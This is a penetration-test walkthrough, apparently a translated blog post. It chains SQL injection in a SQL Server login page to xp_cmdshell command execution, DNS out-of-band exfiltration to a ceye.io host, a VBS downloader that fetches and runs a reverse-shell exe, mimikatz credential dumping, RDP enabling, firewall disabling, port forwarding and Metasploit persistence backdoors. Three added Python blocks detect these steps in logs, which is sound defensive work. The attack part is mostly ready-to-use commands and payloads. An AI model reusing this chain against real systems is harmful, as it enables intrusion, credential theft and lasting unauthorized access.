After a round of directory scanning with dirsearch, nothing was found.
Accessing the IP that the main site's domain resolves to directly showed that the main site sits behind a CDN.
Subdomain brute force: scan the subdomains.
One of the subdomains is not behind the CDN, which reveals the website's real IP.
After getting the real IP, an nmap scan found an unknown application on port 8099.
Accessing it showed a web service with a login interface.
While nmap was still running, I briefly browsed the functions of the main website: it is pseudo-static, and there is no dynamic function anywhere on the site.
So we focus on the web service on port 8099 found by nmap.
Routine test with admin / admin: the prompt says the password is wrong.
l3yx / xxx: the account does not exist.
So we can be sure that the account and the password are verified separately, and that an admin account exists. There is no captcha either, so brute force is possible in theory, but I only manually tried several common weak passwords, to no avail.
When you enter a single quotation mark (admin' / 123123), the surprise comes: there is SQL injection!
So I habitually constructed the "universal password": admin / x' or 'x'='x --
Then I realised: the earlier tests showed that the account and password are verified separately, so the back-end check is certainly not a simple SQL statement of the form where username = xxx and password = xxx. So continue testing and observe the error messages.
The account/password verification appears to call a stored procedure, something like execute @result = verify 'xxx','xxx';
When the account / password is admin / 11', 'XX' --, the page returns normally.
Because I am not familiar with stored procedure injection in SQL Server, rather than trying to construct a payload that logs in successfully, I changed my approach.
SQL Server allows stacked queries by default, so as long as the preceding statement is closed, any SQL statement can be executed after it, and system commands can then be executed through stored procedures.
First, enable the extended stored procedure with the following statement:
exec sp_configure 'show advanced options', 1; RECONFIGURE; exec sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Execute system commands:
exec master..xp_cmdshell "whoami"
The result of command execution is not echoed here, so the ping command is used to judge whether the command executed, as shown here.
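From the defender's side, the sp_configure statement above leaves a trace: SQL Server writes a line to its ERRORLOG every time sp_configure changes an option. The following Python is an added example (not from the original post) that parses constructed ERRORLOG lines, modelled on the wording of that message, and raises an alert when xp_cmdshell goes from 0 to 1, with higher severity when the same session flipped 'show advanced options' just before, as the one-batch statement above does.

```python
import re
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG lines (not from the original post), written to
# match the message SQL Server logs when sp_configure changes an option.
SAMPLE_ERRORLOG = """\
2023-05-01 10:00:01.10 spid12s     Server is listening on [ 'any' <ipv4> 1433].
2023-05-01 10:14:02.31 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-01 10:14:02.33 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-05-01 11:30:00.00 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(?P<spid>spid\d+s?)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

def parse_config_changes(log_text):
    """Return one dict per sp_configure change recorded in the ERRORLOG."""
    changes = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            changes.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
                "spid": m["spid"],
                "option": m["option"],
                "old": int(m["old"]),
                "new": int(m["new"]),
            })
    return changes

def xp_cmdshell_alerts(changes, window=timedelta(minutes=5)):
    """Alert when xp_cmdshell is enabled. Severity is high when the same session
    enabled 'show advanced options' within the window beforehand, which is the
    one-batch pattern: advanced options first, then xp_cmdshell."""
    alerts = []
    for c in changes:
        if c["option"] != "xp_cmdshell" or not (c["old"] == 0 and c["new"] == 1):
            continue
        staged = any(
            p["option"] == "show advanced options" and p["new"] == 1
            and p["spid"] == c["spid"] and timedelta(0) <= c["ts"] - p["ts"] <= window
            for p in changes
        )
        alerts.append({"spid": c["spid"], "ts": c["ts"],
                       "severity": "high" if staged else "medium"})
    return alerts
```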
Sometimes it is hard to work without seeing the command output. Here I still wanted to observe the result of command execution, so I used the DNS out-of-band method. In fact, the following command does it:
cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!"
During the actual test we hit a lot of pitfalls:
The current working directory may not be writable.
The target server seems not to have nslookup, but it does have ping.
The & characters must be URL-encoded, otherwise the web server treats them as parameter separators.
The generated temp files must be deleted, otherwise the next execution fails.
Inside a double-quoted string in SQL Server, a double quotation mark is written as two double quotation marks.
The final payload:
exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";
exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";
exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
And it is system permission straight away.
The cmd command line can't download files, PowerShell is easily intercepted by anti-virus software, and testing PowerShell commands on this server was unsuccessful, so VBS is used to download the file.
VBS download script:
iLocal = LCase(WScript.Arguments(1))
iRemote = LCase(WScript.Arguments(0))
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET", iRemote, 0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile iLocal, 2
Usage: cscript D:/l.vbs http://xx.xx.xx.xx/x.exe D:/x.exe
So we have to use the command execution from the SQL injection to write the script to a file, as follows:
echo iLocal=LCase(WScript.Arguments(1))>D:/l.vbs
echo iRemote=LCase(WScript.Arguments(0))>>D:/l.vbs
echo Set xPost=CreateObject(""Microsoft.XMLHTTP"")>>D:/l.vbs
echo xPost.Open ""GET"",iRemote,0 >>D:/l.vbs
echo xPost.Send() >>D:/l.vbs
echo Set sGet=CreateObject(""ADODB.Stream"")>>D:/l.vbs
echo sGet.Mode=3 >>D:/l.vbs
echo sGet.Type=1 >>D:/l.vbs
echo sGet.Open() >>D:/l.vbs
echo sGet.Write(xPost.responseBody) >>D:/l.vbs
echo sGet.SaveToFile iLocal,2 >>D:/l.vbs
Note that the above commands cannot all be entered together joined with &, because the maximum parameter length is 128; also, a double quotation mark inside a double-quoted string in SQL Server is entered as two double quotation marks, not with an escape character, as shown in the figure.
After executing cscript D:/l.vbs http://ip/x.exe D:/x.exe, you can see the download record on the server,
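Every step of the command chains above (certutil -encode, a ping of a hostname built from an environment variable, echo-writing a .vbs, cscript fetching a URL) runs as a child of sqlservr.exe, which is exactly what process-creation telemetry such as Sysmon Event ID 1 records. The following Python is an added example, not from the original post, that applies a lineage check and command-line rules to constructed events; the image paths and the 203.0.113.10 address are made up for the sample.

```python
import re

# Constructed process-creation events (not from the original post) in the shape of
# Sysmon Event ID 1 fields; the command lines mirror the chain described in the text.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c whoami>D:/temp&&certutil -encode D:/temp D:/temp2&&findstr /L /V "CERTIFICATE" D:/temp2>D:/temp3'},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd /v /c "set /p MYVAR=< D:/temp3 && set FINAL=!MYVAR!.xxx.ceye.io && ping !FINAL!"'},
    {"ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c echo Set xPost=CreateObject("Microsoft.XMLHTTP")>>D:/l.vbs'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": "cscript D:/l.vbs http://203.0.113.10/x.exe D:/x.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ping intranet-fileserver"},  # benign control case
]

# Command-line rules for the individual steps; lineage is checked separately,
# since xp_cmdshell is the usual reason sqlservr.exe ever spawns a shell.
RULES = [
    ("certutil-encode-output", re.compile(r"\bcertutil\s+-encode\b", re.I)),
    ("dns-oob-via-env-var", re.compile(r"\b(?:ping|nslookup)\s+[!%]\w+[!%]", re.I)),
    ("script-written-by-echo", re.compile(r"\becho\b.*>>?\s*\S+\.(?:vbs|js|ps1|bat)\b", re.I)),
    ("cscript-remote-url", re.compile(r"\b[cw]script\b.*https?://", re.I)),
]

def classify(event):
    """Findings for one event: the lineage finding first, then each matching rule."""
    findings = []
    if (event["ParentImage"].lower().endswith("sqlservr.exe")
            and event["Image"].lower().endswith(("cmd.exe", "powershell.exe"))):
        findings.append("sqlservr-spawned-shell")
    for name, pattern in RULES:
        if pattern.search(event["CommandLine"]):
            findings.append(name)
    return findings

def scan(events):
    """Map each suspicious command line to its findings; events with none are dropped."""
    report = {}
    for event in events:
        findings = classify(event)
        if findings:
            report[event["CommandLine"]] = findings
    return report
```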
indicating that the VBS script was written successfully and the file was downloaded. But after running D:/x.exe I didn't receive a shell. I suspected that anti-virus software had stopped it, even though I had done AV evasion...
After checking, I found that the server was a 32-bit system and I had used a 64-bit payload, which naturally won't succeed. I replaced it with a 32-bit one and successfully got the reverse shell.
ipconfig
After checking the IP, I found that it is in an intranet.
View domain users:
net group /domain
Chinese characters come out garbled. Originally I wanted to switch to the UTF-8 code page with chcp 65001, but as soon as I switch to UTF-8 the shell breaks; I don't know the specific reason. If UTF-8 doesn't work, chcp 437 switches to the IBM437 English code page.
It's a little disappointing to see that there is no domain here.
netstat -ano
arp -a
Capture user hashes
If the hashes can't be cracked, mimikatz can capture plaintext directly. It is built into Metasploit and can be loaded directly:
load mimikatz
Then use the kerberos command to capture them,
or use mimikatz_command to run mimikatz commands:
mimikatz_command -f sekurlsa::logonpasswords
Port 3389 is not open on the target, but on Win7, Win2003 and XP systems it can be turned on with the following command:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Close the firewall:
netsh firewall set opmode mode=disable
After trying to close the firewall, the connection still failed.
Testing found that port 3389 was still closed.
Silly me...
This server is in the intranet; to connect to it, the port must first be forwarded to the public network.
Metasploit port forwarding:
portfwd add -l 3389 -p 3389 -r 192.168.50.2
This command forwards port 3389 (-p 3389) of the target (-r 192.168.50.2) to port 3389 (-l 3389) on my server.
Then open Remote Desktop Connection with the public IP of my server as the address; the port is also 3389, so there is no need to change it.
To scan the target intranet, a route must be added first:
run autoroute -s 192.168.50.2/24
Scan the target intranet with Metasploit's portscan module to find the number of live hosts in the intranet:
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.50.2/24
set ports 139,445
It's a bit slow; I gave up halfway through the scan before finding any other hosts.
Metasploit metsvc module
This is very simple to use:
run metsvc
It actually installs a service on the target.
To connect, use the exploit/multi/handler module, set the payload to windows/metsvc_bind_tcp, and set the target IP and the bind port 31337.
Metasploit persistence module
run persistence -U -i 60 -p 5555 -r xx.xx.xx.xx
-U: start the backdoor automatically when the user logs in; this adds an entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run in the registry.
-i: reverse connection interval, in seconds;
-p: reverse connection port;
-r: reverse connection IP address.
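The reg add that clears fDenyTSConnections, the netsh firewall change and the persistence module's Run key entry are all registry writes, which Sysmon records as Event ID 13 (HKCU shows up there as HKU\<SID>). The following Python is an added example, not from the original post, that triages constructed events of that shape; the legacy EnableFirewall path, the SID, the user name and the value name are assumptions made for the sample.

```python
import re

# Constructed registry value-set events (not from the original post) in the shape of
# Sysmon Event ID 13; SID, user name and value names are made up for the sample.
REG_EVENTS = [
    {"TargetObject": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"TargetObject": r"HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall",
     "Details": "DWORD (0x00000000)"},
    {"TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\AbCdEfGh",
     "Details": r"C:\Users\bob\AppData\Local\Temp\AbCdEfGh.vbs"},
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},  # benign control case
]

DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Temp|ProgramData|Users\\[^\\]+\\Downloads)\\", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:vbs|js|ps1|bat|cmd|hta)\b", re.I)

def dword_value(details):
    """Decode Sysmon's 'DWORD (0x........)' rendering; None for non-DWORD data."""
    m = DWORD_RE.fullmatch(details)
    return int(m.group(1), 16) if m else None

def classify_registry_event(event):
    """Return a finding name for one value-set event, or None when it looks benign."""
    target = event["TargetObject"]
    details = event["Details"]
    low = target.lower()
    if low.endswith(r"\control\terminal server\fdenytsconnections") and dword_value(details) == 0:
        return "rdp-enabled-via-registry"
    if "firewallpolicy" in low and low.endswith(r"\enablefirewall") and dword_value(details) == 0:
        return "host-firewall-disabled"
    if RUN_KEY_RE.search(target) and (USER_WRITABLE_RE.search(details) or SCRIPT_EXT_RE.search(details)):
        return "run-key-persistence-user-writable"
    return None

def triage(events):
    """Return (TargetObject, finding) pairs for the events that produced a finding."""
    findings = []
    for event in events:
        name = classify_registry_event(event)
        if name:
            findings.append((event["TargetObject"], name))
    return findings
```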
The cleanup script is shown in the figure below.
To remove the backdoor, run that script in meterpreter.